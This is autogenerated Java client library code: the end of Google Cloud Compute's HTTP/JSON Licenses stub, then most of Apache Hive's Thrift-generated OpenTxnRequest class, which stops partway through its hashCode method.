ProtoRestSerializer<ListLicensesRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<ListLicensesRequest> serializer = ProtoRestSerializer.create(); if (request.hasFilter()) { serializer.putQueryParam(fields, "filter", request.getFilter()); } if (request.hasMaxResults()) { serializer.putQueryParam( fields, "maxResults", request.getMaxResults()); } if (request.hasOrderBy()) { serializer.putQueryParam(fields, "orderBy", request.getOrderBy()); } if (request.hasPageToken()) { serializer.putQueryParam(fields, "pageToken", request.getPageToken()); } if (request.hasReturnPartialSuccess()) { serializer.putQueryParam( fields, "returnPartialSuccess", request.getReturnPartialSuccess()); } return fields; }) .setRequestBodyExtractor(request -> null) .build()) .setResponseParser( ProtoMessageResponseParser.<LicensesListResponse>newBuilder() .setDefaultInstance(LicensesListResponse.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<SetIamPolicyLicenseRequest, Policy> setIamPolicyMethodDescriptor = ApiMethodDescriptor.<SetIamPolicyLicenseRequest, Policy>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/SetIamPolicy") .setHttpMethod("POST") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<SetIamPolicyLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{resource}/setIamPolicy", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<SetIamPolicyLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); serializer.putPathParam(fields, "resource", request.getResource()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<SetIamPolicyLicenseRequest> serializer = ProtoRestSerializer.create(); return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody( "globalSetPolicyRequestResource", request.getGlobalSetPolicyRequestResource(), false)) .build()) .setResponseParser( ProtoMessageResponseParser.<Policy>newBuilder() .setDefaultInstance(Policy.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor< TestIamPermissionsLicenseRequest, TestPermissionsResponse> testIamPermissionsMethodDescriptor = ApiMethodDescriptor .<TestIamPermissionsLicenseRequest, TestPermissionsResponse>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/TestIamPermissions") .setHttpMethod("POST") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<TestIamPermissionsLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{resource}/testIamPermissions", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<TestIamPermissionsLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "project", request.getProject()); serializer.putPathParam(fields, "resource", request.getResource()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<TestIamPermissionsLicenseRequest> serializer = ProtoRestSerializer.create(); return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody( "testPermissionsRequestResource", request.getTestPermissionsRequestResource(), false)) .build()) .setResponseParser( ProtoMessageResponseParser.<TestPermissionsResponse>newBuilder() .setDefaultInstance(TestPermissionsResponse.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .build(); private static final ApiMethodDescriptor<UpdateLicenseRequest, Operation> updateMethodDescriptor = ApiMethodDescriptor.<UpdateLicenseRequest, Operation>newBuilder() .setFullMethodName("google.cloud.compute.v1.Licenses/Update") .setHttpMethod("PATCH") .setType(ApiMethodDescriptor.MethodType.UNARY) .setRequestFormatter( ProtoMessageRequestFormatter.<UpdateLicenseRequest>newBuilder() .setPath( "/compute/v1/projects/{project}/global/licenses/{license}", request -> { Map<String, String> fields = new HashMap<>(); ProtoRestSerializer<UpdateLicenseRequest> serializer = ProtoRestSerializer.create(); serializer.putPathParam(fields, "license", request.getLicense()); serializer.putPathParam(fields, "project", request.getProject()); return fields; }) .setQueryParamsExtractor( request -> { Map<String, List<String>> fields = new HashMap<>(); ProtoRestSerializer<UpdateLicenseRequest> serializer = ProtoRestSerializer.create(); if (request.hasRequestId()) { serializer.putQueryParam(fields, "requestId", request.getRequestId()); } if (request.hasUpdateMask()) { serializer.putQueryParam(fields, "updateMask", request.getUpdateMask()); } return fields; }) .setRequestBodyExtractor( request -> ProtoRestSerializer.create() .toBody("licenseResource", request.getLicenseResource(), false)) .build()) .setResponseParser( ProtoMessageResponseParser.<Operation>newBuilder() .setDefaultInstance(Operation.getDefaultInstance()) .setDefaultTypeRegistry(typeRegistry) .build()) .setOperationSnapshotFactory( (UpdateLicenseRequest request, Operation response) -> { StringBuilder opName = new StringBuilder(response.getName()); opName.append(":").append(request.getProject()); return HttpJsonOperationSnapshot.newBuilder() .setName(opName.toString()) .setMetadata(response) .setDone(Status.DONE.equals(response.getStatus())) .setResponse(response) .setError(response.getHttpErrorStatusCode(), response.getHttpErrorMessage()) .build(); }) .build(); private final UnaryCallable<DeleteLicenseRequest, Operation> deleteCallable; private final OperationCallable<DeleteLicenseRequest, Operation, Operation> deleteOperationCallable; private final UnaryCallable<GetLicenseRequest, License> getCallable; private final UnaryCallable<GetIamPolicyLicenseRequest, Policy> getIamPolicyCallable; private final UnaryCallable<InsertLicenseRequest, Operation> insertCallable; private final OperationCallable<InsertLicenseRequest, Operation, Operation> insertOperationCallable; private final UnaryCallable<ListLicensesRequest, LicensesListResponse> listCallable; private final UnaryCallable<ListLicensesRequest, ListPagedResponse> listPagedCallable; private final UnaryCallable<SetIamPolicyLicenseRequest, Policy> setIamPolicyCallable; private final UnaryCallable<TestIamPermissionsLicenseRequest, TestPermissionsResponse> testIamPermissionsCallable; private final UnaryCallable<UpdateLicenseRequest, Operation> updateCallable; private final OperationCallable<UpdateLicenseRequest, Operation, Operation> updateOperationCallable; private final BackgroundResource backgroundResources; private final HttpJsonGlobalOperationsStub httpJsonOperationsStub; private final HttpJsonStubCallableFactory callableFactory; public static final HttpJsonLicensesStub create(LicensesStubSettings settings) throws IOException { return new HttpJsonLicensesStub(settings, ClientContext.create(settings)); } public static final HttpJsonLicensesStub create(ClientContext clientContext) throws IOException { return new HttpJsonLicensesStub(LicensesStubSettings.newBuilder().build(), clientContext); } public static final HttpJsonLicensesStub create( ClientContext clientContext, HttpJsonStubCallableFactory callableFactory) throws IOException { return new HttpJsonLicensesStub( LicensesStubSettings.newBuilder().build(), clientContext, callableFactory); } /** * Constructs an instance of HttpJsonLicensesStub, using the given settings. This is protected so * that it is easy to make a subclass, but otherwise, the static factory methods should be * preferred. */ protected HttpJsonLicensesStub(LicensesStubSettings settings, ClientContext clientContext) throws IOException { this(settings, clientContext, new HttpJsonLicensesCallableFactory()); } /** * Constructs an instance of HttpJsonLicensesStub, using the given settings. This is protected so * that it is easy to make a subclass, but otherwise, the static factory methods should be * preferred. */ protected HttpJsonLicensesStub( LicensesStubSettings settings, ClientContext clientContext, HttpJsonStubCallableFactory callableFactory) throws IOException { this.callableFactory = callableFactory; this.httpJsonOperationsStub = HttpJsonGlobalOperationsStub.create(clientContext, callableFactory); HttpJsonCallSettings<DeleteLicenseRequest, Operation> deleteTransportSettings = HttpJsonCallSettings.<DeleteLicenseRequest, Operation>newBuilder() .setMethodDescriptor(deleteMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("license", String.valueOf(request.getLicense())); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); HttpJsonCallSettings<GetLicenseRequest, License> getTransportSettings = HttpJsonCallSettings.<GetLicenseRequest, License>newBuilder() .setMethodDescriptor(getMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("license", String.valueOf(request.getLicense())); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); HttpJsonCallSettings<GetIamPolicyLicenseRequest, Policy> getIamPolicyTransportSettings = HttpJsonCallSettings.<GetIamPolicyLicenseRequest, Policy>newBuilder() .setMethodDescriptor(getIamPolicyMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); builder.add("resource", String.valueOf(request.getResource())); return builder.build(); }) .build(); HttpJsonCallSettings<InsertLicenseRequest, Operation> insertTransportSettings = HttpJsonCallSettings.<InsertLicenseRequest, Operation>newBuilder() .setMethodDescriptor(insertMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); HttpJsonCallSettings<ListLicensesRequest, LicensesListResponse> listTransportSettings = HttpJsonCallSettings.<ListLicensesRequest, LicensesListResponse>newBuilder() .setMethodDescriptor(listMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); HttpJsonCallSettings<SetIamPolicyLicenseRequest, Policy> setIamPolicyTransportSettings = HttpJsonCallSettings.<SetIamPolicyLicenseRequest, Policy>newBuilder() .setMethodDescriptor(setIamPolicyMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); builder.add("resource", String.valueOf(request.getResource())); return builder.build(); }) .build(); HttpJsonCallSettings<TestIamPermissionsLicenseRequest, TestPermissionsResponse> testIamPermissionsTransportSettings = HttpJsonCallSettings .<TestIamPermissionsLicenseRequest, TestPermissionsResponse>newBuilder() .setMethodDescriptor(testIamPermissionsMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("project", String.valueOf(request.getProject())); builder.add("resource", String.valueOf(request.getResource())); return builder.build(); }) .build(); HttpJsonCallSettings<UpdateLicenseRequest, Operation> updateTransportSettings = HttpJsonCallSettings.<UpdateLicenseRequest, Operation>newBuilder() .setMethodDescriptor(updateMethodDescriptor) .setTypeRegistry(typeRegistry) .setParamsExtractor( request -> { RequestParamsBuilder builder = RequestParamsBuilder.create(); builder.add("license", String.valueOf(request.getLicense())); builder.add("project", String.valueOf(request.getProject())); return builder.build(); }) .build(); this.deleteCallable = callableFactory.createUnaryCallable( deleteTransportSettings, settings.deleteSettings(), clientContext); this.deleteOperationCallable = callableFactory.createOperationCallable( deleteTransportSettings, settings.deleteOperationSettings(), clientContext, httpJsonOperationsStub); this.getCallable = callableFactory.createUnaryCallable( getTransportSettings, settings.getSettings(), clientContext); this.getIamPolicyCallable = callableFactory.createUnaryCallable( getIamPolicyTransportSettings, settings.getIamPolicySettings(), clientContext); this.insertCallable = callableFactory.createUnaryCallable( insertTransportSettings, settings.insertSettings(), clientContext); this.insertOperationCallable = callableFactory.createOperationCallable( insertTransportSettings, settings.insertOperationSettings(), clientContext, httpJsonOperationsStub); this.listCallable = callableFactory.createUnaryCallable( listTransportSettings, settings.listSettings(), clientContext); this.listPagedCallable = callableFactory.createPagedCallable( listTransportSettings, settings.listSettings(), clientContext); this.setIamPolicyCallable = callableFactory.createUnaryCallable( setIamPolicyTransportSettings, settings.setIamPolicySettings(), clientContext); this.testIamPermissionsCallable = callableFactory.createUnaryCallable( testIamPermissionsTransportSettings, settings.testIamPermissionsSettings(), clientContext); this.updateCallable = callableFactory.createUnaryCallable( updateTransportSettings, settings.updateSettings(), clientContext); this.updateOperationCallable = callableFactory.createOperationCallable( updateTransportSettings, settings.updateOperationSettings(), clientContext, httpJsonOperationsStub); this.backgroundResources = new BackgroundResourceAggregation(clientContext.getBackgroundResources()); } @InternalApi public static List<ApiMethodDescriptor> getMethodDescriptors() { List<ApiMethodDescriptor> methodDescriptors = new ArrayList<>(); methodDescriptors.add(deleteMethodDescriptor); methodDescriptors.add(getMethodDescriptor); methodDescriptors.add(getIamPolicyMethodDescriptor); methodDescriptors.add(insertMethodDescriptor); methodDescriptors.add(listMethodDescriptor); methodDescriptors.add(setIamPolicyMethodDescriptor); methodDescriptors.add(testIamPermissionsMethodDescriptor); methodDescriptors.add(updateMethodDescriptor); return methodDescriptors; } @Override public UnaryCallable<DeleteLicenseRequest, Operation> deleteCallable() { return deleteCallable; } @Override public OperationCallable<DeleteLicenseRequest, Operation, Operation> deleteOperationCallable() { return deleteOperationCallable; } @Override public UnaryCallable<GetLicenseRequest, License> getCallable() { return getCallable; } @Override public UnaryCallable<GetIamPolicyLicenseRequest, Policy> getIamPolicyCallable() { return getIamPolicyCallable; } @Override public UnaryCallable<InsertLicenseRequest, Operation> insertCallable() { return insertCallable; } @Override public OperationCallable<InsertLicenseRequest, Operation, Operation> insertOperationCallable() { return insertOperationCallable; } @Override public UnaryCallable<ListLicensesRequest, LicensesListResponse> listCallable() { return listCallable; } @Override public UnaryCallable<ListLicensesRequest, ListPagedResponse> listPagedCallable() { return listPagedCallable; } @Override public UnaryCallable<SetIamPolicyLicenseRequest, Policy> setIamPolicyCallable() { return setIamPolicyCallable; } @Override public UnaryCallable<TestIamPermissionsLicenseRequest, TestPermissionsResponse> testIamPermissionsCallable() { return testIamPermissionsCallable; } @Override public UnaryCallable<UpdateLicenseRequest, Operation> updateCallable() { return updateCallable; } @Override public OperationCallable<UpdateLicenseRequest, Operation, Operation> updateOperationCallable() { return updateOperationCallable; } @Override public final void close() { try { backgroundResources.close(); } catch (RuntimeException e) { throw e; } catch (Exception e) { throw new IllegalStateException("Failed to close resource", e); } } @Override public void shutdown() { backgroundResources.shutdown(); } @Override public boolean isShutdown() { return backgroundResources.isShutdown(); } @Override public boolean isTerminated() { return backgroundResources.isTerminated(); } @Override public void shutdownNow() { backgroundResources.shutdownNow(); } @Override public boolean awaitTermination(long duration, TimeUnit unit) throws InterruptedException { return backgroundResources.awaitTermination(duration, unit); } }
apache/hive
35,826
standalone-metastore/metastore-common/src/gen/thrift/gen-javabean/org/apache/hadoop/hive/metastore/api/OpenTxnRequest.java
/** * Autogenerated by Thrift Compiler (0.16.0) * * DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING * @generated */ package org.apache.hadoop.hive.metastore.api; @SuppressWarnings({"cast", "rawtypes", "serial", "unchecked", "unused"}) @javax.annotation.Generated(value = "Autogenerated by Thrift Compiler (0.16.0)") @org.apache.hadoop.classification.InterfaceAudience.Public @org.apache.hadoop.classification.InterfaceStability.Stable public class OpenTxnRequest implements org.apache.thrift.TBase<OpenTxnRequest, OpenTxnRequest._Fields>, java.io.Serializable, Cloneable, Comparable<OpenTxnRequest> { private static final org.apache.thrift.protocol.TStruct STRUCT_DESC = new org.apache.thrift.protocol.TStruct("OpenTxnRequest"); private static final org.apache.thrift.protocol.TField NUM_TXNS_FIELD_DESC = new org.apache.thrift.protocol.TField("num_txns", org.apache.thrift.protocol.TType.I32, (short)1); private static final org.apache.thrift.protocol.TField USER_FIELD_DESC = new org.apache.thrift.protocol.TField("user", org.apache.thrift.protocol.TType.STRING, (short)2); private static final org.apache.thrift.protocol.TField HOSTNAME_FIELD_DESC = new org.apache.thrift.protocol.TField("hostname", org.apache.thrift.protocol.TType.STRING, (short)3); private static final org.apache.thrift.protocol.TField AGENT_INFO_FIELD_DESC = new org.apache.thrift.protocol.TField("agentInfo", org.apache.thrift.protocol.TType.STRING, (short)4); private static final org.apache.thrift.protocol.TField REPL_POLICY_FIELD_DESC = new org.apache.thrift.protocol.TField("replPolicy", org.apache.thrift.protocol.TType.STRING, (short)5); private static final org.apache.thrift.protocol.TField REPL_SRC_TXN_IDS_FIELD_DESC = new org.apache.thrift.protocol.TField("replSrcTxnIds", org.apache.thrift.protocol.TType.LIST, (short)6); private static final org.apache.thrift.protocol.TField TXN_TYPE_FIELD_DESC = new org.apache.thrift.protocol.TField("txn_type", org.apache.thrift.protocol.TType.I32, (short)7); private static final org.apache.thrift.scheme.SchemeFactory STANDARD_SCHEME_FACTORY = new OpenTxnRequestStandardSchemeFactory(); private static final org.apache.thrift.scheme.SchemeFactory TUPLE_SCHEME_FACTORY = new OpenTxnRequestTupleSchemeFactory(); private int num_txns; // required private @org.apache.thrift.annotation.Nullable java.lang.String user; // required private @org.apache.thrift.annotation.Nullable java.lang.String hostname; // required private @org.apache.thrift.annotation.Nullable java.lang.String agentInfo; // optional private @org.apache.thrift.annotation.Nullable java.lang.String replPolicy; // optional private @org.apache.thrift.annotation.Nullable java.util.List<java.lang.Long> replSrcTxnIds; // optional private @org.apache.thrift.annotation.Nullable TxnType txn_type; // optional /** The set of fields this struct contains, along with convenience methods for finding and manipulating them. */ public enum _Fields implements org.apache.thrift.TFieldIdEnum { NUM_TXNS((short)1, "num_txns"), USER((short)2, "user"), HOSTNAME((short)3, "hostname"), AGENT_INFO((short)4, "agentInfo"), REPL_POLICY((short)5, "replPolicy"), REPL_SRC_TXN_IDS((short)6, "replSrcTxnIds"), /** * * @see TxnType */ TXN_TYPE((short)7, "txn_type"); private static final java.util.Map<java.lang.String, _Fields> byName = new java.util.HashMap<java.lang.String, _Fields>(); static { for (_Fields field : java.util.EnumSet.allOf(_Fields.class)) { byName.put(field.getFieldName(), field); } } /** * Find the _Fields constant that matches fieldId, or null if its not found. */ @org.apache.thrift.annotation.Nullable public static _Fields findByThriftId(int fieldId) { switch(fieldId) { case 1: // NUM_TXNS return NUM_TXNS; case 2: // USER return USER; case 3: // HOSTNAME return HOSTNAME; case 4: // AGENT_INFO return AGENT_INFO; case 5: // REPL_POLICY return REPL_POLICY; case 6: // REPL_SRC_TXN_IDS return REPL_SRC_TXN_IDS; case 7: // TXN_TYPE return TXN_TYPE; default: return null; } } /** * Find the _Fields constant that matches fieldId, throwing an exception * if it is not found. */ public static _Fields findByThriftIdOrThrow(int fieldId) { _Fields fields = findByThriftId(fieldId); if (fields == null) throw new java.lang.IllegalArgumentException("Field " + fieldId + " doesn't exist!"); return fields; } /** * Find the _Fields constant that matches name, or null if its not found. */ @org.apache.thrift.annotation.Nullable public static _Fields findByName(java.lang.String name) { return byName.get(name); } private final short _thriftId; private final java.lang.String _fieldName; _Fields(short thriftId, java.lang.String fieldName) { _thriftId = thriftId; _fieldName = fieldName; } public short getThriftFieldId() { return _thriftId; } public java.lang.String getFieldName() { return _fieldName; } } // isset id assignments private static final int __NUM_TXNS_ISSET_ID = 0; private byte __isset_bitfield = 0; private static final _Fields optionals[] = {_Fields.AGENT_INFO,_Fields.REPL_POLICY,_Fields.REPL_SRC_TXN_IDS,_Fields.TXN_TYPE}; public static final java.util.Map<_Fields, org.apache.thrift.meta_data.FieldMetaData> metaDataMap; static { java.util.Map<_Fields, org.apache.thrift.meta_data.FieldMetaData> tmpMap = new java.util.EnumMap<_Fields, org.apache.thrift.meta_data.FieldMetaData>(_Fields.class); tmpMap.put(_Fields.NUM_TXNS, new org.apache.thrift.meta_data.FieldMetaData("num_txns", org.apache.thrift.TFieldRequirementType.REQUIRED, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.I32))); tmpMap.put(_Fields.USER, new org.apache.thrift.meta_data.FieldMetaData("user", org.apache.thrift.TFieldRequirementType.REQUIRED, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.STRING))); tmpMap.put(_Fields.HOSTNAME, new org.apache.thrift.meta_data.FieldMetaData("hostname", org.apache.thrift.TFieldRequirementType.REQUIRED, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.STRING))); tmpMap.put(_Fields.AGENT_INFO, new org.apache.thrift.meta_data.FieldMetaData("agentInfo", org.apache.thrift.TFieldRequirementType.OPTIONAL, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.STRING))); tmpMap.put(_Fields.REPL_POLICY, new org.apache.thrift.meta_data.FieldMetaData("replPolicy", org.apache.thrift.TFieldRequirementType.OPTIONAL, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.STRING))); tmpMap.put(_Fields.REPL_SRC_TXN_IDS, new org.apache.thrift.meta_data.FieldMetaData("replSrcTxnIds", org.apache.thrift.TFieldRequirementType.OPTIONAL, new org.apache.thrift.meta_data.ListMetaData(org.apache.thrift.protocol.TType.LIST, new org.apache.thrift.meta_data.FieldValueMetaData(org.apache.thrift.protocol.TType.I64)))); tmpMap.put(_Fields.TXN_TYPE, new org.apache.thrift.meta_data.FieldMetaData("txn_type", org.apache.thrift.TFieldRequirementType.OPTIONAL, new org.apache.thrift.meta_data.EnumMetaData(org.apache.thrift.protocol.TType.ENUM, TxnType.class))); metaDataMap = java.util.Collections.unmodifiableMap(tmpMap); org.apache.thrift.meta_data.FieldMetaData.addStructMetaDataMap(OpenTxnRequest.class, metaDataMap); } public OpenTxnRequest() { this.agentInfo = "Unknown"; this.txn_type = org.apache.hadoop.hive.metastore.api.TxnType.DEFAULT; } public OpenTxnRequest( int num_txns, java.lang.String user, java.lang.String hostname) { this(); this.num_txns = num_txns; setNum_txnsIsSet(true); this.user = user; this.hostname = hostname; } /** * Performs a deep copy on <i>other</i>. */ public OpenTxnRequest(OpenTxnRequest other) { __isset_bitfield = other.__isset_bitfield; this.num_txns = other.num_txns; if (other.isSetUser()) { this.user = other.user; } if (other.isSetHostname()) { this.hostname = other.hostname; } if (other.isSetAgentInfo()) { this.agentInfo = other.agentInfo; } if (other.isSetReplPolicy()) { this.replPolicy = other.replPolicy; } if (other.isSetReplSrcTxnIds()) { java.util.List<java.lang.Long> __this__replSrcTxnIds = new java.util.ArrayList<java.lang.Long>(other.replSrcTxnIds); this.replSrcTxnIds = __this__replSrcTxnIds; } if (other.isSetTxn_type()) { this.txn_type = other.txn_type; } } public OpenTxnRequest deepCopy() { return new OpenTxnRequest(this); } @Override public void clear() { setNum_txnsIsSet(false); this.num_txns = 0; this.user = null; this.hostname = null; this.agentInfo = "Unknown"; this.replPolicy = null; this.replSrcTxnIds = null; this.txn_type = org.apache.hadoop.hive.metastore.api.TxnType.DEFAULT; } public int getNum_txns() { return this.num_txns; } public void setNum_txns(int num_txns) { this.num_txns = num_txns; setNum_txnsIsSet(true); } public void unsetNum_txns() { __isset_bitfield = org.apache.thrift.EncodingUtils.clearBit(__isset_bitfield, __NUM_TXNS_ISSET_ID); } /** Returns true if field num_txns is set (has been assigned a value) and false otherwise */ public boolean isSetNum_txns() { return org.apache.thrift.EncodingUtils.testBit(__isset_bitfield, __NUM_TXNS_ISSET_ID); } public void setNum_txnsIsSet(boolean value) { __isset_bitfield = org.apache.thrift.EncodingUtils.setBit(__isset_bitfield, __NUM_TXNS_ISSET_ID, value); } @org.apache.thrift.annotation.Nullable public java.lang.String getUser() { return this.user; } public void setUser(@org.apache.thrift.annotation.Nullable java.lang.String user) { this.user = user; } public void unsetUser() { this.user = null; } /** Returns true if field user is set (has been assigned a value) and false otherwise */ public boolean isSetUser() { return this.user != null; } public void setUserIsSet(boolean value) { if (!value) { this.user = null; } } @org.apache.thrift.annotation.Nullable public java.lang.String getHostname() { return this.hostname; } public void setHostname(@org.apache.thrift.annotation.Nullable java.lang.String hostname) { this.hostname = hostname; } public void unsetHostname() { this.hostname = null; } /** Returns true if field hostname is set (has been assigned a value) and false otherwise */ public boolean isSetHostname() { return this.hostname != null; } public void setHostnameIsSet(boolean value) { if (!value) { this.hostname = null; } } @org.apache.thrift.annotation.Nullable public java.lang.String getAgentInfo() { return this.agentInfo; } public void setAgentInfo(@org.apache.thrift.annotation.Nullable java.lang.String agentInfo) { this.agentInfo = agentInfo; } public void unsetAgentInfo() { this.agentInfo = null; } /** Returns true if field agentInfo is set (has been assigned a value) and false otherwise */ public boolean isSetAgentInfo() { return this.agentInfo != null; } public void setAgentInfoIsSet(boolean value) { if (!value) { this.agentInfo = null; } } @org.apache.thrift.annotation.Nullable public java.lang.String getReplPolicy() { return this.replPolicy; } public void setReplPolicy(@org.apache.thrift.annotation.Nullable java.lang.String replPolicy) { this.replPolicy = replPolicy; } public void unsetReplPolicy() { this.replPolicy = null; } /** Returns true if field replPolicy is set (has been assigned a value) and false otherwise */ public boolean isSetReplPolicy() { return this.replPolicy != null; } public void setReplPolicyIsSet(boolean value) { if (!value) { this.replPolicy = null; } } public int getReplSrcTxnIdsSize() { return (this.replSrcTxnIds == null) ? 0 : this.replSrcTxnIds.size(); } @org.apache.thrift.annotation.Nullable public java.util.Iterator<java.lang.Long> getReplSrcTxnIdsIterator() { return (this.replSrcTxnIds == null) ? null : this.replSrcTxnIds.iterator(); } public void addToReplSrcTxnIds(long elem) { if (this.replSrcTxnIds == null) { this.replSrcTxnIds = new java.util.ArrayList<java.lang.Long>(); } this.replSrcTxnIds.add(elem); } @org.apache.thrift.annotation.Nullable public java.util.List<java.lang.Long> getReplSrcTxnIds() { return this.replSrcTxnIds; } public void setReplSrcTxnIds(@org.apache.thrift.annotation.Nullable java.util.List<java.lang.Long> replSrcTxnIds) { this.replSrcTxnIds = replSrcTxnIds; } public void unsetReplSrcTxnIds() { this.replSrcTxnIds = null; } /** Returns true if field replSrcTxnIds is set (has been assigned a value) and false otherwise */ public boolean isSetReplSrcTxnIds() { return this.replSrcTxnIds != null; } public void setReplSrcTxnIdsIsSet(boolean value) { if (!value) { this.replSrcTxnIds = null; } } /** * * @see TxnType */ @org.apache.thrift.annotation.Nullable public TxnType getTxn_type() { return this.txn_type; } /** * * @see TxnType */ public void setTxn_type(@org.apache.thrift.annotation.Nullable TxnType txn_type) { this.txn_type = txn_type; } public void unsetTxn_type() { this.txn_type = null; } /** Returns true if field txn_type is set (has been assigned a value) and false otherwise */ public boolean isSetTxn_type() { return this.txn_type != null; } public void setTxn_typeIsSet(boolean value) { if (!value) { this.txn_type = null; } } public void setFieldValue(_Fields field, @org.apache.thrift.annotation.Nullable java.lang.Object value) { switch (field) { case NUM_TXNS: if (value == null) { unsetNum_txns(); } else { setNum_txns((java.lang.Integer)value); } break; case USER: if (value == null) { unsetUser(); } else { setUser((java.lang.String)value); } break; case HOSTNAME: if (value == null) { unsetHostname(); } else { setHostname((java.lang.String)value); } break; case AGENT_INFO: if (value == null) { unsetAgentInfo(); } else { setAgentInfo((java.lang.String)value); } break; case REPL_POLICY: if (value == null) { unsetReplPolicy(); } else { setReplPolicy((java.lang.String)value); } break; case REPL_SRC_TXN_IDS: if (value == null) { unsetReplSrcTxnIds(); } else { setReplSrcTxnIds((java.util.List<java.lang.Long>)value); } break; case TXN_TYPE: if (value == null) { unsetTxn_type(); } else { setTxn_type((TxnType)value); } break; } } @org.apache.thrift.annotation.Nullable public java.lang.Object getFieldValue(_Fields field) { switch (field) { case NUM_TXNS: return getNum_txns(); case USER: return getUser(); case HOSTNAME: return getHostname(); case AGENT_INFO: return getAgentInfo(); case REPL_POLICY: return getReplPolicy(); case REPL_SRC_TXN_IDS: return getReplSrcTxnIds(); case TXN_TYPE: return getTxn_type(); } throw new java.lang.IllegalStateException(); } /** Returns true if field corresponding to fieldID is set (has been assigned a value) and false otherwise */ public boolean isSet(_Fields field) { if (field == null) { throw new java.lang.IllegalArgumentException(); } switch (field) { case NUM_TXNS: return isSetNum_txns(); case USER: return isSetUser(); case HOSTNAME: return isSetHostname(); case AGENT_INFO: return isSetAgentInfo(); case REPL_POLICY: return isSetReplPolicy(); case REPL_SRC_TXN_IDS: return isSetReplSrcTxnIds(); case TXN_TYPE: return isSetTxn_type(); } throw new java.lang.IllegalStateException(); } @Override public boolean equals(java.lang.Object that) { if (that instanceof OpenTxnRequest) return this.equals((OpenTxnRequest)that); return false; } public boolean equals(OpenTxnRequest that) { if (that == null) return false; if (this == that) return true; boolean this_present_num_txns = true; boolean that_present_num_txns = true; if (this_present_num_txns || that_present_num_txns) { if (!(this_present_num_txns && that_present_num_txns)) return false; if (this.num_txns != that.num_txns) return false; } boolean this_present_user = true && this.isSetUser(); boolean that_present_user = true && that.isSetUser(); if (this_present_user || that_present_user) { if (!(this_present_user && that_present_user)) return false; if (!this.user.equals(that.user)) return false; } boolean this_present_hostname = true && this.isSetHostname(); boolean that_present_hostname = true && that.isSetHostname(); if (this_present_hostname || that_present_hostname) { if (!(this_present_hostname && that_present_hostname)) return false; if (!this.hostname.equals(that.hostname)) return false; } boolean this_present_agentInfo = true && this.isSetAgentInfo(); boolean that_present_agentInfo = true && that.isSetAgentInfo(); if (this_present_agentInfo || that_present_agentInfo) { if (!(this_present_agentInfo && that_present_agentInfo)) return false; if (!this.agentInfo.equals(that.agentInfo)) return false; } boolean this_present_replPolicy = true && this.isSetReplPolicy(); boolean that_present_replPolicy = true && that.isSetReplPolicy(); if (this_present_replPolicy || that_present_replPolicy) { if (!(this_present_replPolicy && that_present_replPolicy)) return false; if (!this.replPolicy.equals(that.replPolicy)) return false; } boolean this_present_replSrcTxnIds = true && this.isSetReplSrcTxnIds(); boolean that_present_replSrcTxnIds = true && that.isSetReplSrcTxnIds(); if (this_present_replSrcTxnIds || that_present_replSrcTxnIds) { if (!(this_present_replSrcTxnIds && that_present_replSrcTxnIds)) return false; if (!this.replSrcTxnIds.equals(that.replSrcTxnIds)) return false; } boolean this_present_txn_type = true && this.isSetTxn_type(); boolean that_present_txn_type = true && that.isSetTxn_type(); if (this_present_txn_type || that_present_txn_type) { if (!(this_present_txn_type && that_present_txn_type)) return false; if (!this.txn_type.equals(that.txn_type)) return false; } return true; } @Override public int hashCode() { int 